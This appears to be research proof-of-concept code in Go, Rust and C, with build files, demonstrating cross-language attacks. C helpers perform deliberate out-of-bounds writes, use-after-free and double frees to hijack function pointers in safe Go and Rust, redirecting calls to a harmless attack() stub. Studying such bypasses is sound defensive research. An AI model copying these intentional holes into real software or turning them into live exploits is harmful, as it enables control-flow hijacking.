 12 | 	"fmt"
 13 | 	"unsafe"
 14 | )
 15 | 
 16 | var fa_attack = attack
 17 | 
 18 | const MAX_LENGTH = 3
 19 | 
 20 | //export get_attack
 21 | func get_attack() C.int64_t {
 22 | 
 23 | 	// Get a pointer to the address of the function pointer
 24 | 	p := unsafe.Pointer(&fa_attack)
 25 | 
 26 | 	// Pull out the address of a function pointer from the pointer to the address of the function pointer
 27 | 	p_addr := C.int64_t(uintptr(p))
 28 | 
 29 | 	return p_addr
 30 | }
 31 | 
 32 | type Data struct {
 33 | 	vals  [MAX_LENGTH]int64
 34 | 	cb    *func(*int64)
 35 | 	slice []int64
 36 | 	cb2   *func(*int64)
 37 | }
 38 | 
 39 | // A simple benign function that doubles a value
 40 | //go:noinline
 41 | func doubler(x *int64) {
 42 | 	fmt.Println("Not attacked! Adding two to the input...")
 43 | 	*x = *x + 2
 44 | }
 45 | 
 46 | // A simple benign function that increments a value
 47 | //go:noinline
 48 | func incrementer(x *int64) {
 49 | 	fmt.Println("Not attacked! Adding one to the input...")
 50 | 	*x = *x + 1
 51 | }
 52 | 
 53 | // Attack aims to call this
 54 | // Could be replaced with actual gadgets that together execute a weird machine
 55 | //go:noinline
 56 | func attack() {
 57 | 	fmt.Println("We were attacked!")
 58 | }
 59 | 
 60 | // Main function
 61 | //go:noinline
 62 | func analyze_data(cb_fptr *func(*int64)) {
 63 | 
 64 | 	// Initialize program
 65 | 	C.init()
 66 | 
 67 | 	// Set up some function pointers
 68 | 	fa1 := incrementer
 69 | 	fp1 := (*func(*int64))(&fa1)
 70 | 	fa2 := doubler
 71 | 	fp2 := (*func(*int64))(&fa2)
 72 | 
 73 | 	// Initialize some data
 74 | 	data := Data{
 75 | 		vals:  [3]int64{1, 2, 3},
 76 | 		cb:    fp1,
 77 | 		slice: []int64{4, 5},
 78 | 		cb2:   fp2,
 79 | 	}
 80 | 	fmt.Println("Start data: vals[0]=", data.vals[0], "cb=", data.cb, "slice[0]=", data.slice[0], "cb2=", data.cb2)
 81 | 
 82 | 	// Get and print the addresses of the Data struct
 83 | 	data_vals_addr := C.int64_t(uintptr(unsafe.Pointer(&data.vals)))
 84 | 	data_cb_addr := C.int64_t(uintptr(unsafe.Pointer(&data.cb)))
 85 | 	data_slice_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice)))
 86 | 	data_cb2_addr := C.int64_t(uintptr(unsafe.Pointer(&data.cb2)))
 87 | 
 88 | 	fmt.Println("data_vals_addr", data_vals_addr)
 89 | 	fmt.Println("data_cb_addr", data_cb_addr)
 90 | 	fmt.Println("data_slice_addr", data_slice_addr)
 91 | 	fmt.Println("data_cb2_addr", data_cb2_addr)
 92 | 
 93 | 	// Get and print the address of the function argument to this function
 94 | 	cb_fptr_addr := C.int64_t(uintptr(unsafe.Pointer(&cb_fptr)))
 95 | 	fmt.Println("cb_fptr_addr", cb_fptr_addr)
 96 | 
 97 | 	// Get and print the address of heap data that a new stores
 98 | 	doubler_fp := new(func(*int64))
 99 | 	doubler_fp = fp2
100 | 	doubler_fp_addr := C.int64_t(uintptr(unsafe.Pointer(&doubler_fp)))
101 | 	fmt.Println("doubler_fp_addr", doubler_fp_addr)
102 | 
103 | 	// Get and print the address of heap data that a new stores
104 | 	doubler2_fp := new(func(*int64))
105 | 	doubler2_fp = fp2
106 | 	doubler2_fp_addr := C.int64_t(uintptr(unsafe.Pointer(&doubler2_fp)))
107 | 	fmt.Println("doubler2_fp_addr", doubler2_fp_addr)
108 | 
109 | 	// Get a callback function pointer from C
110 | 	incrementer_fp_addr := C.get_cb_from_c()
111 | 	// Derive a function pointer from the address of a pointer to a function pointer
112 | 	incrementer_fp := (*func(*int64))(unsafe.Pointer(uintptr(incrementer_fp_addr)))
113 | 
114 | 	// Section 4 Attacks
115 | 	/* Go Static Bounds Check Bypass Attack */
116 | 	fmt.Println("Launching Go Bounds Check Bypass Attack...")
117 | 	C.user_given_array(data_vals_addr)
118 | 
119 | 	fmt.Println("Calling data.cb...")
120 | 	(*data.cb)(&data.vals[0])
121 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
122 | 
123 | 	/* Go Garbage Collection Bypass Attack */
124 | 	fmt.Println("Launching Go Garbage Collection Bypass Attack...")
125 | 	C.print_array_addr(doubler_fp_addr)
126 | 
127 | 	fmt.Println("Calling doubler_fp...")
128 | 	(*doubler_fp)(&data.vals[0])
129 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
130 | 
131 | 	/* C/C++ Hardening Bypass Attack */
132 | 	fmt.Println("Launching C/C++ Hardening Bypass Attack...")
133 | 	C.user_set_array()
134 | 
135 | 	fmt.Println("Calling cb_fptr...")
136 | 	(*cb_fptr)(&data.vals[0])
137 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
138 | 
139 | 	// Section 5 Attacks
140 | 	/* Corrupting Go Dynamic Bounds */
141 | 	fmt.Println("Launching Go Dynaic Bounds Check Bypass Attack...")
142 | 	C.user_given_slice(data_slice_addr)
143 | 
144 | 	// Now we can access past the length of data.slice in *Safe Go*
145 | 	// Length of slice is only 2 (and capacity is 2)
146 | 	// E.g., data.slice[22] actually points to doubler2_fp on the heap
147 | 	// So setting data.slice[22] actually corrupts the value a pointer holds
148 | 	// Moreover, slice_index and slice_val could come from a corruptible source, e.g., user input
149 | 	data_slice0_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice[0])))
150 | 	slice_index := (doubler2_fp_addr - data_slice0_addr) / 8
151 | 
152 | 	if slice_index > 0 {
153 | 		data_slice_I_addr := C.int64_t(uintptr(unsafe.Pointer(&data.slice[slice_index])))
154 | 
155 | 		fmt.Println("addr of data.slice[0]:", data_slice0_addr)
156 | 		fmt.Println("addr of data.slice[slice_index]:", data_slice_I_addr)
157 | 
158 | 		slice_val := int64(get_attack())
159 | 
160 | 		/* This OOB is done in Safe Go! */
161 | 		data.slice[slice_index] = slice_val
162 | 
163 | 	} else {
164 | 		// ASLR placed doubler2_fp "below" data.slice in the heap
165 | 		// But, we can't access a slice with a negative value
166 | 		fmt.Println("ASLR protected us! Better luck next time attacker...")
167 | 	}
168 | 
169 | 	fmt.Println("Calling doubler2_fp...")
170 | 	(*doubler2_fp)(&data.vals[0])
171 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
172 | 
173 | 	/* Corrupting Intended Interactions */
174 | 	fmt.Println("Launching Intended Interactions Attack...")
175 | 
176 | 	fmt.Println("Calling incrementer_fp...")
177 | 	(*incrementer_fp)(&data.vals[0])
178 | 	fmt.Println("Updated data: vals[0]=", data.vals[0])
179 | 
180 | 	/* Corrupting with Double Frees */
181 | 	// Unsure exactly when, but Go will try to free doubler_fp
182 | 	// but it was already freed in print_array_addr
183 | 	// This will cause an abort, but could be used to execute a weird machine
184 | }
185 | 
186 | func main() {
187 | 	// Set up a function pointer
188 | 	fa0 := incrementer
189 | 	fp0 := (*func(*int64))(&fa0)
190 | 
191 | 	// Call the main function
192 | 	analyze_data(fp0)
193 | 
194 | 	fmt.Println("Finished main.")
195 | }
196 | 


--------------------------------------------------------------------------------
/rust-cla-examples/Cargo.lock:
--------------------------------------------------------------------------------
 1 | # This file is automatically @generated by Cargo.
 2 | # It is not intended for manual editing.
 3 | [[package]]
 4 | name = "cc"
 5 | version = "1.0.72"
 6 | source = "registry+https://github.com/rust-lang/crates.io-index"
 7 | checksum = "22a9137b95ea06864e018375b72adfb7db6e6f68cfc8df5a04d00288050485ee"
 8 | 
 9 | [[package]]
10 | name = "rust-cla-ex"
11 | version = "0.1.0"
12 | dependencies = [
13 |  "cc",
14 | ]
15 | 


--------------------------------------------------------------------------------
/rust-cla-examples/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "rust-cla-ex"
 3 | version = "0.1.0"
 4 | authors = ["Samuel Mergendahl"]
 5 | edition = "2018"
 6 | 
 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 8 | 
 9 | [dependencies]
10 | 
11 | [build-dependencies]
12 | cc = "1.0"
13 | 
14 | [[bin]]
15 | name = "cla"
16 | path = "src/main.rs"
17 | 


--------------------------------------------------------------------------------
/rust-cla-examples/Makefile:
--------------------------------------------------------------------------------
 1 | DIR=$(dir $(realpath $(firstword $(MAKEFILE_LIST))))
 2 | 
 3 | all: rust
 4 | 
 5 | dynamic-c:
 6 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
 7 | 	clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o -fsanitize=cfi -flto -fvisibility=hidden
 8 | 
 9 | static-c:
10 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
11 | 	ar crs $(DIR)src/init/libinit.a $(DIR)/src/init/init.o 
12 | 
13 | rust: static-c 
14 | 	RUSTFLAGS="-Clinker-plugin-lto -Clinker=clang -Clink-arg=-fuse-ld=lld" cargo build --release
15 | 
16 | sim: 
17 | 	$(DIR)/target/release/cla 
18 | 
19 | obj: rust 
20 | 	objdump -S $(DIR)/target/release/cla > $(DIR)/main.obj
21 | 	
22 | clean:
23 | 	rm -rf target
24 | 	rm -f $(DIR)/src/init/libinit.a
25 | 	rm -f $(DIR)/src/init/libinit.so
26 | 	rm -f $(DIR)/src/init/init.o
27 | 	rm -f $(DIR)/main.obj
28 | 


--------------------------------------------------------------------------------
/rust-cla-examples/build.rs:
--------------------------------------------------------------------------------
1 | fn main() {
2 |     println!("cargo:rustc-link-search=./src/init/");
3 |     //println!("cargo:rustc-link-lib=dylib=init");
4 |     println!("cargo:rustc-link-lib=static=init");
5 | }
6 | 


--------------------------------------------------------------------------------
/rust-cla-examples/src/init/init.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <malloc.h>
  5 | 
  6 | // Simple function that acts user input
  7 | extern int64_t get_attack();
  8 | 
  9 | // Simple initialization function
 10 | void init() {
 11 |     // Turns off heap checks for double frees 
 12 |     // Set to lowest level which just prints out the error and continues
 13 |     // Not strictly necessary, but helps with presentation
 14 |     // I.e., prints when we achieved a double free
 15 |     mallopt(M_CHECK_ACTION, 1);
 16 | }
 17 | 
 18 | // Given the array to modify, this function set a field in the array  
 19 | // Can cause an OOB vulnerability
 20 | void user_given_array(int64_t array_ptr_addr) {
 21 |     // These values could be set by a corruptible source, e.g., user input
 22 |     // Thus, the index points to Data.cb and value is the address of attack() 
 23 |     // This is an OOB as it indexes past the allocated array of size 3)
 24 |     int64_t array_index = 3;
 25 |     int64_t array_value = get_attack(); 
 26 | 
 27 |     int64_t* a = (void *)array_ptr_addr;
 28 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 29 | 
 30 |     a[array_index] = array_value;
 31 |     printf("Done with user_given_array.\n");
 32 | }
 33 | 
 34 | // This function prints the address of a given array 
 35 | // Can cause UaF and DF vulnerabilities
 36 | void print_array_addr(int64_t array_ptr_addr) {
 37 |     int64_t* a = (void *)array_ptr_addr;
 38 |     printf("addr of a in print_array_addr: %ld\n", (int64_t)a);
 39 | 
 40 |     // This is an unnecessary free call, as Rust allocated the array 
 41 |     // (and subsequently Rust will free this array later) 
 42 |     free(a);
 43 | 
 44 |     // C now thinks it can use a for something else 
 45 |     // (e.g., set it to a user defined address)
 46 |     // Rust may not realize this functionality occurs
 47 |     // These values could be set by a corruptible source, e.g., user input 
 48 |     int64_t array_value = get_attack(); 
 49 |     *a = array_value;
 50 | 
 51 |     printf("Done with print_array_addr.\n");
 52 | }
 53 | 
 54 | 
 55 | // This function allocates its own array and populates based on user input
 56 | void user_set_array() {
 57 | 
 58 |     // Initialize array
 59 |     int64_t a[1] = { 0 };
 60 | 
 61 |     // These values could be set by a corruptible source, e.g., user input
 62 |     // Thus, the index points to Data.cb and value is the address of attack() 
 63 |     // This is an OOB as it indexes past the allocated array of size 3)
 64 |     int64_t array_index = 28; 
 65 |     int64_t array_value = get_attack(); 
 66 | 
 67 |     printf("addr of &a: %ld\n", (int64_t)&a);
 68 |     printf("array_value %ld\n", array_value);
 69 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 70 | 
 71 |     a[array_index] = array_value;
 72 |     printf("Done with user_set_array.\n");
 73 | }
 74 | 
 75 | // Rust calls this function to get the right address of a call back function
 76 | // If Rust doesn't properly sanitize data from this function, 
 77 | // it could return corrupted data
 78 | int64_t get_cb_from_c() {
 79 |     // These values could be set by a corruptible source, e.g., user input
 80 |     int64_t call_back_addr = get_attack(); 
 81 | 
 82 |     return call_back_addr;
 83 | }
 84 | 
 85 | // Given the array to modify, this function set a field in the array  
 86 | // Can cause an OOB vulnerability
 87 | void user_given_vec(int64_t vec_ptr_addr) {
 88 |     // These values could be set by a corruptible source, e.g., user input
 89 |     // Thus, the index points to the Vec fat pointer and value too large 
 90 |     // This is an OOB as it indexes past the allocated array of size 3)
 91 |     int64_t array_index = 2;
 92 |     int64_t array_value = 10000000; 
 93 | 
 94 |     int64_t* a = (void *)vec_ptr_addr;
 95 | 
 96 |     printf("addr of a[array_index] in user_given_slice: %ld\n", (int64_t)&(a[array_index]));
 97 | 
 98 |     a[array_index] = array_value;
 99 |     printf("Done with user_given_vec.\n");
100 | }
101 | 


--------------------------------------------------------------------------------
/rust-cla-examples/src/init/init.h:
--------------------------------------------------------------------------------
1 | #include <stdint.h>
2 | 
3 | void init();
4 | void user_given_array(int64_t array_ptr_addr);
5 | void print_array_addr(int64_t array_ptr_addr);
6 | void user_set_array();
7 | void user_given_vec(int64_t vec_ptr_addr);
8 | int64_t get_cb_from_c();
9 | 


--------------------------------------------------------------------------------
/rust-cla-examples/src/main.rs:
--------------------------------------------------------------------------------
  1 | /* External unsafe functions */
  2 | 
  3 | extern "C" { fn init(); }
  4 | extern "C" { fn user_set_array(); }
  5 | extern "C" { fn user_given_array(array_ptr_addr: i64); }
  6 | extern "C" { fn user_given_vec(vec_ptr_addr: i64); }
  7 | extern "C" { fn print_array_addr(array_ptr_addr: i64); }
  8 | extern "C" { fn get_cb_from_c() -> i64; }
  9 | 
 10 | // A simple function that acts as user input
 11 | #[no_mangle]
 12 | extern "C" fn get_attack() -> i64 {
 13 |     return attack as i64;
 14 | }
 15 | 
 16 | pub const MAX_LENGTH: usize = 3;
 17 | 
 18 | // A simple struct that we frequently manipulate
 19 | pub struct Data {
 20 |     vals: [i64;MAX_LENGTH],
 21 |     cb: fn(&mut i64),
 22 |     vecs: std::vec::Vec<i64>,
 23 |     cb2: fn(&mut i64)
 24 | }
 25 | 
 26 | // A simple benign function that doubles a value
 27 | #[no_mangle]
 28 | #[inline(never)]
 29 | pub fn doubler(x: &mut i64) {
 30 |     println!("Not attacked! Adding two to input...");
 31 |     *x += 2;
 32 | }
 33 | 
 34 | // A simple benign function that increments a value
 35 | #[no_mangle]
 36 | #[inline(never)]
 37 | pub fn incrementer(x: &mut i64) {
 38 |     println!("Not attacked! Adding one to input...");
 39 |     *x += 1;
 40 | }
 41 | 
 42 | // Attack aims to call this
 43 | // Could be replaced with actual gadgets that together execute a weird machine
 44 | #[no_mangle]
 45 | #[inline(never)]
 46 | pub fn attack() {
 47 |     println!("We were attacked!");
 48 | }
 49 | 
 50 | // Main function
 51 | #[no_mangle]
 52 | #[inline(never)]
 53 | fn analyze_data(cb_fptr: fn(&mut i64)) {
 54 | 
 55 |     // Initialize program
 56 |     unsafe{init()};
 57 |     
 58 |     // Set up some function pointers
 59 |     let fp1 = incrementer;
 60 |     let fp2 = doubler;
 61 | 
 62 |     // Initialize some data 
 63 |     let mut data = Data {
 64 |         vals: [1,2,3],
 65 |         cb: fp1,
 66 |         vecs: vec![4,5],
 67 |         cb2: fp2
 68 |     };
 69 |     println!("Start data: vals[0]={}, cb={}, vecs[0]={}, cb2={}", 
 70 |              data.vals[0], 
 71 |              data.cb as *const fn(&mut i64) as i64, 
 72 |              data.vecs[0], 
 73 |              data.cb2 as *const fn(&mut i64) as i64);
 74 | 
 75 |     // Get and print the addresses of the Data Struct
 76 |     let data_vals_addr = &data.vals as *const i64 as i64;
 77 |     let data_cb_addr = &data.cb as *const fn(&mut i64) as i64;
 78 |     let data_vecs_addr = &data.vecs as *const std::vec::Vec<i64> as i64;
 79 |     let data_cb2_addr = &data.cb2 as *const fn(&mut i64) as i64;
 80 | 
 81 |     println!("data_vals_addr: {}", data_vals_addr);
 82 |     println!("data_cb_addr: {}", data_cb_addr);
 83 |     println!("data_vecs_addr: {}", data_vecs_addr);
 84 |     println!("data_cb2_addr: {}", data_cb2_addr);
 85 | 
 86 |     // Get and print the address of the function argument to this function 
 87 |     let cb_fptr_addr = &cb_fptr as *const fn(&mut i64) as i64;
 88 |     println!("cb_fptr_addr: {}", cb_fptr_addr);
 89 | 
 90 |     // Get and print the address of heap data that a Box stores
 91 |     let doubler_fp: Box<fn(&mut i64)> = Box::new(doubler);
 92 |     let doubler_fp_addr = &(*doubler_fp) as *const fn(&mut i64) as i64;
 93 |     println!("doubler_fp_addr: {}", doubler_fp_addr);
 94 | 
 95 |     // Get and print the address of heap data that a Box stores
 96 |     let doubler2_fp: Box<fn(&mut i64)> = Box::new(doubler);
 97 |     let doubler2_fp_addr = &(*doubler2_fp) as *const fn(&mut i64) as i64;
 98 |     println!("doubler2_fp_addr: {}", doubler2_fp_addr);
 99 | 
100 |     // Get a callback function pointer from C
101 |     // Uses unsafe because it needs to parse data from C 
102 |     // since this is used as an intended interaction
103 |     let incrementer_fp = unsafe { 
104 |         let c_addr: i64 = get_cb_from_c();
105 |         let ptr = c_addr as *const fn(&mut i64);
106 |         let fp: fn(&mut i64) = std::mem::transmute::<*const fn(&mut i64), fn(&mut i64)>(ptr);
107 |         fp
108 |     }; 
109 | 
110 |     // Section 4 Attacks
111 |     /* Rust Bounds Check Bypass Attack */
112 |     println!("Launching Rust Bounds Check Bypass Attack...");
113 |     unsafe{ user_given_array(data_vals_addr) }
114 | 
115 |     println!("Calling data.cb...");
116 |     (data.cb)(&mut data.vals[0]);
117 |     println!("Updated data: vals[0]={}", data.vals[0]);
118 | 
119 |     /* Rust Lifetime Bypass Attack */
120 |     println!("Launching Rust Lifetimes Bypass Attack...");
121 |     unsafe{ print_array_addr(doubler_fp_addr) }
122 | 
123 |     println!("Calling doubler_fp...");
124 |     doubler_fp(&mut data.vals[0]);
125 |     println!("Updated data: vals[0]={}", data.vals[0]);
126 | 
127 |     /* C/C++ Hardening Bypass Attack */
128 |     println!("Launching C/C++ Hardening Bypass Attack...");
129 |     unsafe{ user_set_array() }
130 | 
131 |     println!("Calling cb_fptr...");
132 |     cb_fptr(&mut data.vals[0]);
133 |     println!("Updated data: vals[0]={}", data.vals[0]);
134 | 
135 |     // Section 5 Attacks
136 |     /* Corrupting Rust Dynamic Bounds */
137 |     println!("Launching Dynamic Rust Bounds Check Bypass Attack...");
138 |     unsafe{ user_given_vec(data_vecs_addr) }
139 | 
140 |     // Now we can access past the length of data.vecs in *Safe Rust*
141 |     // Length of vec is only 2 (and capacity is 2)
142 |     // E.g., data.vec[22] actually points to doubler2_fp on the heap 
143 |     // So setting data.vec[22] actually corrupts the value a pointer holds
144 |     // Moreover, vec_index and vec_val could come from a corruptible source, e.g., user input
145 | 
146 |     let data_vecs0_addr = &data.vecs[0] as *const i64 as i64;
147 |     let vec_index = ((doubler2_fp_addr - data_vecs0_addr)/8) as usize; 
148 |     let vec_val = get_attack();
149 |     
150 |     println!("addr of data.vecs[0]: {}", &data.vecs[0] as *const i64 as i64);
151 |     println!("addr of data.vecs[vec_index]: {}", &data.vecs[vec_index] as *const i64 as i64);
152 | 
153 |     /* This OOB is done in Safe Rust! */
154 |     data.vecs[vec_index] = vec_val;
155 | 
156 |     println!("Calling doubler2_fp...");
157 |     doubler2_fp(&mut data.vals[0]);
158 |     println!("Updated data: vals[0]={}", data.vals[0]);
159 | 
160 |     /* Corrupting Intended Interactions */
161 |     println!("Launching Intended Interactions Attack...");
162 |     println!("Calling incrementer_fp...");
163 |     incrementer_fp(&mut data.vals[0]);
164 |     println!("Updated data: vals[0]={}", data.vals[0]);
165 | 
166 |     /* Corrupting with Serialization Errors */
167 |     // TODO
168 | 
169 |     /* Corrupting vTable dynamic dispatch */
170 |     // TODO
171 | 
172 |     /* Corrupting with Double Frees */
173 |     // Rust will now free doubler_fp as it goes out of scope here, 
174 |     // but it was already freed in print_array_addr
175 |     // This will cause an abort, but could be used to execute a weird machine
176 | }
177 |  
178 | fn main() {
179 |     // Setup a function pointer
180 |     let fp0 = doubler;
181 | 
182 |     // Call the main function 
183 |     analyze_data(fp0);
184 | 
185 |     println!("Finished main.");
186 | }
187 | 


--------------------------------------------------------------------------------